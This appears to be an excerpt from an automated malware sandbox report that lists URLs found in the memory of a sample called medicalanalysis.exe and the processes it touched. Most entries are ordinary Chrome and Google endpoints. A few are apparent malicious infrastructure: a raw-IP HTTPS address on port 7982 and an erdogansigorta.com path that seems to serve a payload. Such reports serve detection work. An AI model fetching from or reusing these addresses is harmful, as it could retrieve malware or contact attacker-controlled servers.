                      Source: chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2520356636.0000643402E2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
                      Source: chrome.exe, 00000011.00000002.2518435662.0000643402B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
                      Source: medicalanalysis.exe, 00000001.00000002.2218187485.00000000023E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: chrome.exe, 00000011.00000002.2518184561.0000643402B10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://unisolated.invalid/
                      Source: chrome.exe, 00000011.00000002.2518184561.0000643402B10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://unisolated.invalid/a
                      Source: chrome.exe, 00000011.00000002.2518617463.0000643402BF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.gstatic.com/generate_204
                      Source: svchost.exe, svchost.exe, 00000010.00000003.2533266053.0000018B29ADF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2510490271.0000018B29ADF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2737048443.0000018B29AE0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2739348169.0000018B292A0000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2736647958.0000018B2955E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2742133725.0000018B29AC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2475489229.0000018B29AD5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2741695529.0000018B2955E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2387952475.0000018B29AD8000.00000004.00000020.00020000.00000000.sdmp, wmprph.exe, 00000015.00000002.2961414896.00000242C8FD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://104.37.175.218:7982/da03ab84e7f8187e6/v3iuaiea.tsf2o
                      Source: svchost.exe, 00000010.00000003.2533266053.0000018B29ADF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2510490271.0000018B29ADF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2737048443.0000018B29AE0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2475489229.0000018B29AD5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2387952475.0000018B29AD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://104.37.175.218:7982/da03ab84e7f8187e6/v3iuaiea.tsf2oSymbo
                      Source: svchost.exe, 00000007.00000002.2328734842.000000000310C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2739348169.0000018B292A0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://104.37.175.218:7982/da03ab84e7f8187e6/v3iuaiea.tsf2okernelbasentdllkernel32GetProcessMitigat
                      Source: svchost.exe, 00000007.00000002.2328336036.0000000002B3C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://104.37.175.218:7982/da03ab84e7f8187e6/v3iuaiea.tsf2ox
                      Source: svchost.exe, 00000010.00000003.2500265558.0000018B29A2A000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2520449739.0000643402E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: chrome.exe, 00000011.00000002.2514293956.000064340240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/
                      Source: chrome.exe, 00000011.00000002.2513271848.000064340228C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
                      Source: chrome.exe, 00000011.00000002.2513059730.0000643402213000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
                      Source: chrome.exe, 00000011.00000002.2514187223.00006434023AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AddSession
                      Source: chrome.exe, 00000011.00000002.2514293956.000064340240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
                      Source: chrome.exe, 00000011.00000002.2515463302.0000643402650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo?source=ChromiumBrowser
                      Source: chrome.exe, 00000011.00000002.2516237567.00006434027B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2513125866.000064340223C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
                      Source: chrome.exe, 00000011.00000002.2514293956.000064340240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
                      Source: chrome.exe, 00000011.00000002.2514187223.00006434023AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/Logout
                      Source: chrome.exe, 00000011.00000002.2514187223.00006434023AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/Logout1
                      Source: chrome.exe, 00000011.00000002.2515463302.0000643402650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/Logout?source=ChromiumBrowser&continue=https://accounts.google.com/chrom
                      Source: chrome.exe, 00000011.00000002.2514187223.00006434023AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2520134458.0000643402DE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/MergeSession
                      Source: chrome.exe, 00000011.00000002.2514187223.00006434023AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/OAuthLogin
                      Source: chrome.exe, 00000011.00000002.2518699190.0000643402C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/OAuthLogin?source=ChromiumBrowser&issueuberauth=1
                      Source: chrome.exe, 00000011.00000002.2514293956.000064340240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/RotateBoundCookies
                      Source: chrome.exe, 00000011.00000002.2514293956.000064340240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.html
                      Source: chrome.exe, 00000011.00000002.2514293956.000064340240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
                      Source: chrome.exe, 00000011.00000002.2514293956.000064340240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
                      Source: chrome.exe, 00000011.00000002.2513479498.00006434022B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
                      Source: chrome.exe, 00000011.00000002.2513479498.00006434022B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
                      Source: chrome.exe, 00000011.00000002.2513479498.00006434022B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
                      Source: chrome.exe, 00000011.00000002.2514293956.000064340240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
                      Source: chrome.exe, 00000011.00000002.2514293956.000064340240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/windows
                      Source: chrome.exe, 00000011.00000002.2514293956.000064340240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
                      Source: chrome.exe, 00000011.00000002.2514293956.000064340240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
                      Source: chrome.exe, 00000011.00000002.2513271848.000064340228C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
                      Source: chrome.exe, 00000011.00000002.2520134458.0000643402DE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2514293956.000064340240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/o/oauth2/revoke
                      Source: chrome.exe, 00000011.00000002.2520134458.0000643402DE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2514293956.000064340240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/oauth/multilogin
                      Source: chrome.exe, 00000011.00000002.2514293956.000064340240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
                      Source: chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
                      Source: chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
                      Source: chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
                      Source: chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
                      Source: chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
                      Source: chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
                      Source: chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516237567.00006434027B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
                      Source: chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
                      Source: chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2515463302.0000643402650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
                      Source: chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
                      Source: chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
                      Source: chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
                      Source: chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
                      Source: chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
                      Source: chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
                      Source: chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
                      Source: chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
                      Source: medicallanalysis.exe, 0000000A.00000002.2247526818.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, prefs.js.10.drString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                      Source: medicallanalysis.exe, 0000000A.00000002.2247526818.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, prefs.js.10.drString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                      Source: chrome.exe, 00000011.00000002.2517213852.0000643402960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2515428710.0000643402634000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
                      Source: chrome.exe, 00000011.00000002.2520449739.0000643402E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
                      Source: svchost.exe, 00000010.00000003.2500265558.0000018B29A2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: chrome.exe, 00000011.00000002.2520309023.0000643402E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.ico
                      Source: svchost.exe, 00000010.00000003.2500265558.0000018B29A2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: chrome.exe, 00000011.00000002.2520401337.0000643402E38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516651957.0000643402888000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search
                      Source: chrome.exe, 00000011.00000002.2516651957.0000643402888000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
                      Source: chrome.exe, 00000011.00000002.2516651957.0000643402888000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
                      Source: svchost.exe, 00000010.00000003.2500265558.0000018B29A2A000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2518435662.0000643402B8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516237567.00006434027B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: chrome.exe, 00000011.00000002.2514699100.00006434024A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                      Source: chrome.exe, 00000011.00000002.2516237567.00006434027B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore206E5
                      Source: chrome.exe, 00000011.00000002.2520309023.0000643402E20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2518501288.0000643402BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en-GB
                      Source: chrome.exe, 00000011.00000002.2520309023.0000643402E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en-GB4d
                      Source: chrome.exe, 00000011.00000002.2518041079.0000643402AC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en-GBWeb
                      Source: chrome.exe, 00000011.00000003.2499201930.0000643402EC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519080554.0000643402C97000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498912565.0000643402EA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2517689557.0000643402A34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2520803728.0000643402EB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2513764914.0000643402308000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2520759509.0000643402EA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2514699100.00006434024A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
                      Source: chrome.exe, 00000011.00000002.2514799853.00006434024E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
                      Source: chrome.exe, 00000011.00000002.2514799853.00006434024E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
                      Source: chrome.exe, 00000011.00000002.2513125866.000064340223C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
                      Source: chrome.exe, 00000011.00000002.2514187223.00006434023AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/
                      Source: svchost.exe, 00000010.00000003.2506119934.0000018B295E9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2536180877.0000018B2C64C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2506119934.0000018B295DB000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2476913830.00003F14002E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2476885999.00003F14002D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                      Source: chrome.exe, 00000011.00000002.2520309023.0000643402E20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516237567.00006434027B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2513125866.000064340223C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516901369.0000643402900000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2513530469.00006434022DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2514422759.0000643402484000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
                      Source: chrome.exe, 00000011.00000002.2520309023.0000643402E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx0
                      Source: chrome.exe, 00000011.00000002.2513962060.000064340234C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod
                      Source: chrome.exe, 00000011.00000002.2514187223.00006434023AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync
                      Source: chrome.exe, 00000011.00000002.2514187223.00006434023AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync/event
                      Source: chrome.exe, 00000011.00000002.2518184561.0000643402B10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516237567.00006434027B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
                      Source: svchost.exe, 00000007.00000003.2262563836.00000000031A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudflare-dns.com/dns-query
                      Source: svchost.exe, 00000007.00000003.2262563836.00000000031A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudflare-dns.com/dns-queryPOSTContent-TypeContent-LengthHostapplication/dns-message%dMachi
                      Source: medicallanalysis.exe, 0000000A.00000002.2247526818.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, prefs.js.10.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                      Source: medicallanalysis.exe, 0000000A.00000002.2247526818.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, prefs.js.10.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                      Source: chrome.exe, 00000011.00000002.2516696085.00006434028A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516651957.0000643402888000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2515463302.0000643402650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
                      Source: chrome.exe, 00000011.00000002.2516696085.00006434028A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516651957.0000643402888000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2515463302.0000643402650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
                      Source: chrome.exe, 00000011.00000002.2516696085.00006434028A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516651957.0000643402888000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2515463302.0000643402650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
                      Source: chrome.exe, 00000011.00000002.2517213852.0000643402960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2515428710.0000643402634000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
                      Source: chrome.exe, 00000011.00000002.2517213852.0000643402960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2515428710.0000643402634000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
                      Source: chrome.exe, 00000011.00000002.2520309023.0000643402E20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516198359.0000643402790000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                      Source: chrome.exe, 00000011.00000002.2516198359.0000643402790000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=searchTerms
                      Source: chrome.exe, 00000011.00000002.2520449739.0000643402E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: svchost.exe, 00000010.00000003.2500265558.0000018B29A2A000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2520309023.0000643402E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: chrome.exe, 00000011.00000002.2520309023.0000643402E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
                      Source: chrome.exe, 00000011.00000002.2520309023.0000643402E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icoextures
                      Source: svchost.exe, 00000010.00000003.2500265558.0000018B29A2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: chrome.exe, 00000011.00000002.2520309023.0000643402E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icoments
                      Source: medicalanalysis.exe, 00000001.00000002.2218187485.00000000023E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://erdogansigorta.com
                      Source: medicalanalysis.exe, 00000001.00000002.2218187485.00000000023E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://erdogansigorta.com/temp/Nomrwfj.mp4
                      Source: medicalanalysispro.exe, 00000000.00000003.1718835067.0000019852561000.00000004.00000020.00020000.00000000.sdmp, medicalanalysis.exe, 00000001.00000000.1719127053.0000000000042000.00000002.00000001.01000000.00000004.sdmp, medicalanalysis.exe.0.drString found in binary or memory: https://erdogansigorta.com/temp/Nomrwfj.mp41a25KuDOP0Wz50QuCjRfytw==
                      Source: medicalanalysis.exe, 00000001.00000002.2229470684.00000000058E0000.00000004.08000000.00040000.00000000.sdmp, medicalanalysis.exe, 00000001.00000002.2224296580.000000000360A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: medicalanalysis.exe, 00000001.00000002.2229470684.00000000058E0000.00000004.08000000.00040000.00000000.sdmp, medicalanalysis.exe, 00000001.00000002.2224296580.000000000360A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: medicalanalysis.exe, 00000001.00000002.2229470684.00000000058E0000.00000004.08000000.00040000.00000000.sdmp, medicalanalysis.exe, 00000001.00000002.2224296580.000000000360A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
